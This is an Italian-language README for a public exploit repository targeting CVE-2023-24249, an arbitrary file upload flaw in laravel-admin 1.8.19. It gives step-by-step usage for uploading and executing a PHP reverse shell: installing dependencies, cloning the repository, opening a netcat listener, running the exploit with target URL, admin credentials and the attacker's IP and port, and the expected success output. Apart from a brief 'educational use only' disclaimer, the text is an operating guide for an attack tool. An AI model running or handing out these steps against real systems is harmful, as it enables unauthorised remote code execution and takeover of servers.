
Script di exploit per CVE-2023-24249 - una vulnerabilità che consente l'esecuzione remota di codice tramite upload di file e iniezione di comandi.
Questo repository contiene uno script di exploit per CVE-2023-24249, una vulnerabilità critica trovata in laravel-admin versione 1.8.19. Questa vulnerabilità consente il caricamento arbitrario di file, permettendo agli attaccanti di eseguire codice arbitrario tramite un file PHP appositamente predisposto. L'exploit dimostra come un attaccante può caricare una reverse shell sull'applicazione target ed eseguirla per ottenere accesso remoto.
CVE-2023-24249 è una vulnerabilità di caricamento arbitrario di file in laravel-admin v1.8.19. Questa vulnerabilità consente agli attaccanti di caricare ed eseguire file PHP arbitrari, portando a una potenziale esecuzione di codice remoto.
Lo script di exploit fornito automatizza il processo di sfruttamento di CVE-2023-24249. Esegue i seguenti passaggi:
requestsbeautifulsoup4Installa le librerie richieste usando pip:
pip install requests beautifulsoup4
Clona il repository:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
Avvia un listener sulla tua macchina:
nc -lvnp <PORT>
Esegui lo script di exploit:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
Sostituisci <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> e <YOUR_PORT> con i valori appropriati:
<TARGET_URL>: L'URL dell'applicazione target.<USERNAME>: Il nome utente per l'autenticazione.<PASSWORD>: La password per l'autenticazione.python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
Se l'exploit ha successo, lo script produrrà il seguente output:
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
Questo script è destinato esclusivamente a scopi educativi. L'uso non autorizzato di questo script contro qualsiasi sistema senza esplicito permesso è illegale e non etico. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo script.
<YOUR_IP>: Il tuo indirizzo IP per ricevere la connessione reverse shell.<YOUR_PORT>: La porta su cui il tuo listener è in ascolto.